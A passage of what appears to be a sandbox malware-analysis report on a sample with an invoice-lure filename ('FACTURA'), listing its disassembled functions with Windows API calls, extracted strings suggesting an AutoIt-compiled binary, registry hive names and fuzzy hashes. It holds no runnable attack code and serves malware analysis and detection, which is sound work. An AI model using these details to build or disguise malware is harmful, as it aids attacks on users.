                                                                            • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 00F5B9C3
                                                                            • FreeLibrary.KERNEL32(?), ref: 00F5B9CF
                                                                            • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 00F5B9DF
                                                                            • DestroyCursor.USER32(?), ref: 00F5B9EE
                                                                            • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 00F5BA0B
                                                                            • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 00F5BA17
                                                                              • Part of subcall function 00EF2EFD: __wcsicmp_l.LIBCMT ref: 00EF2F86
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Load$Image$LibraryMessageSend$CursorDestroyExtractFreeIcon__wcsicmp_l
                                                                            • String ID: .dll$.exe$.icl
                                                                            • API String ID: 3907162815-1154884017
                                                                            • Opcode ID: e919103f6db9cf4c8931302223f6036ba1f71b65e380cd9c6c2e8bb7267efa3c
                                                                            • Instruction ID: 7446a3b7abd34b33eecb2b1c6b4ec8b8e6f98fe713b3dea2a13ecc0a4ae52cf7
                                                                            • Opcode Fuzzy Hash: e919103f6db9cf4c8931302223f6036ba1f71b65e380cd9c6c2e8bb7267efa3c
                                                                            • Instruction Fuzzy Hash: B361D071900219BAEB14DF64DC45FBE7BA8FB08722F10411AFF15E61C1DB749989EBA0
                                                                            Function 00F3DC1A Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetLocalTime.KERNEL32(?), ref: 00F3DCDC
                                                                            • SystemTimeToFileTime.KERNEL32(?,?), ref: 00F3DCEC
                                                                            • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00F3DCF8
                                                                            • __wsplitpath.LIBCMT ref: 00F3DD56
                                                                            • _wcscat.LIBCMT ref: 00F3DD6E
                                                                            • _wcscat.LIBCMT ref: 00F3DD80
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3DD95
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DDA9
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DDDB
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DDFC
                                                                            • _wcscpy.LIBCMT ref: 00F3DE08
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00F3DE47
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                            • String ID: *.*
                                                                            • API String ID: 3566783562-438819550
                                                                            • Opcode ID: 06cf039dc0502c90d7b987b746cbe6b33b9b375398cde9b7278627bb6aa20555
                                                                            • Instruction ID: 7423ecdfd947d5d01e593f49f873cc8158bbccae1c0559a4b5c6174c1a391fef
                                                                            • Opcode Fuzzy Hash: 06cf039dc0502c90d7b987b746cbe6b33b9b375398cde9b7278627bb6aa20555
                                                                            • Instruction Fuzzy Hash: 23618CB65043059FCB10EF60D8449AEB3E8FF89324F04492EF989D7251DB35EA49DB92
                                                                            Function 00F39C38 Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadStringW.USER32(00000066,?,00000FFF,00000016), ref: 00F39C7F
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00F39CA0
                                                                            • __swprintf.LIBCMT ref: 00F39CF9
                                                                            • __swprintf.LIBCMT ref: 00F39D12
                                                                            • _wprintf.LIBCMT ref: 00F39DB9
                                                                            • _wprintf.LIBCMT ref: 00F39DD7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: LoadString__swprintf_wprintf$_memmove
                                                                            • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                            • API String ID: 311963372-3080491070
                                                                            • Opcode ID: e8ea01191c96a762530225d79c086a93e15eec9796d9d50a235e09858e27f65b
                                                                            • Instruction ID: 5abae864b4cececf6f374092c9404a3c17f1e5bf11ffa68ff3817337eb2ed01b
                                                                            • Opcode Fuzzy Hash: e8ea01191c96a762530225d79c086a93e15eec9796d9d50a235e09858e27f65b
                                                                            • Instruction Fuzzy Hash: 4951D232900609AACF15FBE0CD46EEEB7B9EF04310F500066F545721A1EB716F5AEB61
                                                                            Function 00F3A352 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00ED9837: __itow.LIBCMT ref: 00ED9862
                                                                              • Part of subcall function 00ED9837: __swprintf.LIBCMT ref: 00ED98AC
                                                                            • CharLowerBuffW.USER32(?,?), ref: 00F3A3CB
                                                                            • GetDriveTypeW.KERNEL32 ref: 00F3A418
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3A460
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3A497
                                                                            • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00F3A4C5
                                                                              • Part of subcall function 00ED7BCC: _memmove.LIBCMT ref: 00ED7C06
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                            • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                            • API String ID: 2698844021-4113822522
                                                                            • Opcode ID: 6417fe74aadcf8d3d163b4b28019f2a6e60a945290491503381772654c24bc5a
                                                                            • Instruction ID: 0e4c8606c0df72a427c879b6adbbcd01bdce321cef7885696f85849c60fe5710
                                                                            • Opcode Fuzzy Hash: 6417fe74aadcf8d3d163b4b28019f2a6e60a945290491503381772654c24bc5a
                                                                            • Instruction Fuzzy Hash: 7E516E715043059FC704EF21C99186AB3F4EF88768F40886EF89667362DB31ED0ADB52
                                                                            Function 00F2F8AA Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000001,00000000,00000000,?,00F0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000), ref: 00F2F8DF
                                                                            • LoadStringW.USER32(00000000,?,00F0E029,00000001), ref: 00F2F8E8
                                                                              • Part of subcall function 00ED7DE1: _memmove.LIBCMT ref: 00ED7E22
                                                                            • GetModuleHandleW.KERNEL32(00000000,00F95310,?,00000FFF,?,?,00F0E029,00000001,0000138C,00000001,00000000,00000001,?,00000000,00000000,00000001), ref: 00F2F90A
                                                                            • LoadStringW.USER32(00000000,?,00F0E029,00000001), ref: 00F2F90D
                                                                            • __swprintf.LIBCMT ref: 00F2F95D
                                                                            • __swprintf.LIBCMT ref: 00F2F96E
                                                                            • _wprintf.LIBCMT ref: 00F2FA17
                                                                            • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00F2FA2E
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                            • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                            • API String ID: 984253442-2268648507
                                                                            • Opcode ID: f5d1fe55ddef9dedfba4daa7b0b355d10ac3a8088606e2f0d2b0d9991d7bd639
                                                                            • Instruction ID: 1fe7d6aecd3f02c99e0617c3d36a16ec99681597721c29b469231b057499814a
                                                                            • Opcode Fuzzy Hash: f5d1fe55ddef9dedfba4daa7b0b355d10ac3a8088606e2f0d2b0d9991d7bd639
                                                                            • Instruction Fuzzy Hash: 0A41617280421DAACF04FBE0DD56DEEB7B9EF18340F500066B505B2192EE355F4ADB61
                                                                            Function 00F5BA33 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00F59207,?,?), ref: 00F5BA56
                                                                            • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA6D
                                                                            • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA78
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA85
                                                                            • GlobalLock.KERNEL32(00000000), ref: 00F5BA8E
                                                                            • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BA9D
                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00F5BAA6
                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,00F59207,?,?,00000000,?), ref: 00F5BAAD
                                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 00F5BABE
                                                                            • OleLoadPicture.OLEAUT32(?,00000000,00000000,00F62CAC,?), ref: 00F5BAD7
                                                                            • GlobalFree.KERNEL32(00000000), ref: 00F5BAE7
                                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 00F5BB0B
                                                                            • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00F5BB36
                                                                            • DeleteObject.GDI32(00000000), ref: 00F5BB5E
                                                                            • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00F5BB74
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                            • String ID:
                                                                            • API String ID: 3840717409-0
                                                                            • Opcode ID: 93ca13e0f72c43f5ceda1f866141e9dd1048156adfe8b3af568e9f5b43fdc06c
                                                                            • Instruction ID: 1506395404ee39b2fab873e1d1fa92c05ceb88b613274f7f31a5f4bf8eac6248
                                                                            • Opcode Fuzzy Hash: 93ca13e0f72c43f5ceda1f866141e9dd1048156adfe8b3af568e9f5b43fdc06c
                                                                            • Instruction Fuzzy Hash: A741FA75900208FFDB119F65DC48EABBBB9EB89722F1040A8FA05D7260D7749945EB60
                                                                            Function 00ED6A8C Relevance: 21.5, APIs: 4, Strings: 8, Instructions: 478COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00EF0957: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,00ED6B0C,?,00008000), ref: 00EF0973
                                                                              • Part of subcall function 00ED4750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00ED4743,?,?,00ED37AE,?), ref: 00ED4770
                                                                            • SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 00ED6BAD
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00ED6CFA
                                                                              • Part of subcall function 00ED586D: _wcscpy.LIBCMT ref: 00ED58A5
                                                                              • Part of subcall function 00EF363D: _iswctype.LIBCMT ref: 00EF3645
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$FullNamePath_iswctype_wcscpy
                                                                            • String ID: #include depth exceeded. Make sure there are no recursive includes$/v$>>>AUTOIT SCRIPT<<<$AU3!$Bad directive syntax error$EA06$Error opening the file$Unterminated string
                                                                            • API String ID: 537147316-3512645892
                                                                            • Opcode ID: 1188e92164fc988d233f1db89faec032cde0059c0190ef97ec2c34170f9b9647
                                                                            • Instruction ID: 3bba64475bbdad70dea1da3f3ff8b265d0149680565ec719f1d8617119472609
                                                                            • Opcode Fuzzy Hash: 1188e92164fc988d233f1db89faec032cde0059c0190ef97ec2c34170f9b9647
                                                                            • Instruction Fuzzy Hash: 0802BE715083409FC724EF24C881AAFBBE5EF95314F145C2EF495A72A2DB30D94AEB52
                                                                            Function 00F3D899 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 230COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __wsplitpath.LIBCMT ref: 00F3DA10
                                                                            • _wcscat.LIBCMT ref: 00F3DA28
                                                                            • _wcscat.LIBCMT ref: 00F3DA3A
                                                                            • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00F3DA4F
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DA63
                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00F3DA7B
                                                                            • SetFileAttributesW.KERNEL32(?,00000000), ref: 00F3DA95
                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00F3DAA7
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: CurrentDirectory$AttributesFile_wcscat$__wsplitpath
                                                                            • String ID: *.*
                                                                            • API String ID: 34673085-438819550
                                                                            • Opcode ID: cf62e380f33be48f7a5eaf1a420c37cb7ec5286fe43ece3b8f1ea8ceeae17700
                                                                            • Instruction ID: 7d109233c77e670717e1138087f611215e01a67da03624918457a3d5a2b2b3b8
                                                                            • Opcode Fuzzy Hash: cf62e380f33be48f7a5eaf1a420c37cb7ec5286fe43ece3b8f1ea8ceeae17700
                                                                            • Instruction Fuzzy Hash: AD81B1729043449FCB24EF64D840AAAB7E8FF89734F14482EF889D7251E734E945EB52
                                                                            Function 00F4731A Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetDC.USER32(00000000), ref: 00F4738F
                                                                            • CreateCompatibleBitmap.GDI32(00000000,00000007,?), ref: 00F4739B
                                                                            • CreateCompatibleDC.GDI32(?), ref: 00F473A7
                                                                            • SelectObject.GDI32(00000000,?), ref: 00F473B4
                                                                            • StretchBlt.GDI32(00000006,00000000,00000000,00000007,?,?,?,?,00000007,?,00CC0020), ref: 00F47408
                                                                            • GetDIBits.GDI32(00000006,?,00000000,00000000,00000000,00000028,00000000), ref: 00F47444
                                                                            • GetDIBits.GDI32(00000006,?,00000000,?,00000000,00000028,00000000), ref: 00F47468
                                                                            • SelectObject.GDI32(00000006,?), ref: 00F47470
                                                                            • DeleteObject.GDI32(?), ref: 00F47479
                                                                            • DeleteDC.GDI32(00000006), ref: 00F47480
                                                                            • ReleaseDC.USER32(00000000,?), ref: 00F4748B
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
                                                                            • String ID: (
                                                                            • API String ID: 2598888154-3887548279
                                                                            • Opcode ID: 7dbf93930544655d5546429e6ca1f8396b2fd089934ca9dc2d0ab99fc502865a
                                                                            • Instruction ID: 78bc1643104a48eea15e6f0e6579f61396df4555e9e5bab6f35b429f58e551a7
                                                                            • Opcode Fuzzy Hash: 7dbf93930544655d5546429e6ca1f8396b2fd089934ca9dc2d0ab99fc502865a
                                                                            • Instruction Fuzzy Hash: 39514772904309EFCB14DFA8CC84EAEBBB9EF48310F148469FA5AA7251C731A9449B50
                                                                            Function 00F32D36 Relevance: 19.7, APIs: 13, Instructions: 214windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • _memset.LIBCMT ref: 00F32D50
                                                                            • GetMenuItemInfoW.USER32(00000000,00000007,00000000,00000030), ref: 00F32DDD
                                                                            • GetMenuItemCount.USER32(00F95890), ref: 00F32E66
                                                                            • DeleteMenu.USER32(00F95890,00000005,00000000,000000F5,?,?), ref: 00F32EF6
                                                                            • DeleteMenu.USER32(00F95890,00000004,00000000), ref: 00F32EFE
                                                                            • DeleteMenu.USER32(00F95890,00000006,00000000), ref: 00F32F06
                                                                            • DeleteMenu.USER32(00F95890,00000003,00000000), ref: 00F32F0E
                                                                            • GetMenuItemCount.USER32(00F95890), ref: 00F32F16
                                                                            • SetMenuItemInfoW.USER32(00F95890,00000004,00000000,00000030), ref: 00F32F4C
                                                                            • GetCursorPos.USER32(?), ref: 00F32F56
                                                                            • SetForegroundWindow.USER32(00000000), ref: 00F32F5F
                                                                            • TrackPopupMenuEx.USER32(00F95890,00000000,?,00000000,00000000,00000000), ref: 00F32F72
                                                                            • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00F32F7E
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow_memset
                                                                            • String ID:
                                                                            • API String ID: 3993528054-0
                                                                            • Opcode ID: 64f640a56b35af38440f7f32869b13caaefbb4894840617f88b49f54cf403f6c
                                                                            • Instruction ID: a0ac584b532a2a482bb6bf1e07584642ef32664e32673fb9a0e4cb4b49be5487
                                                                            • Opcode Fuzzy Hash: 64f640a56b35af38440f7f32869b13caaefbb4894840617f88b49f54cf403f6c
                                                                            • Instruction Fuzzy Hash: 8271D571A00209BBEB619F64DC46FAABF64FF04734F144216F625AA1E1C771AC54FB90
                                                                            Function 00F50E1A Relevance: 19.4, APIs: 1, Strings: 10, Instructions: 120COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CharUpperBuffW.USER32(?,?,?,?,?,?,?,00F4FDAD,?,?), ref: 00F50E31
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1298945126.0000000000ED1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00ED0000, based on PE: true
                                                                            • Associated: 00000000.00000002.1298913709.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F84000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F8E000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000000F9D000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1298945126.0000000001021000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299092015.0000000001027000.00000080.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1299108505.0000000001028000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_ed0000_z49FACTURA-0987678.jbxd
                                                                            Similarity
                                                                            • API ID: BuffCharUpper
                                                                            • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                            • API String ID: 3964851224-909552448
                                                                            • Opcode ID: 5f1dd12fa48611f9437bb5fa33ea36356743dad385b3d1ba411b2a61caa01107
                                                                            • Instruction ID: 92b2507a7c97c33f807d1e3a0d6dcf5f12b81b6a0ac6eef86cff9bd96fc5b578
                                                                            • Opcode Fuzzy Hash: 5f1dd12fa48611f9437bb5fa33ea36356743dad385b3d1ba411b2a61caa01107
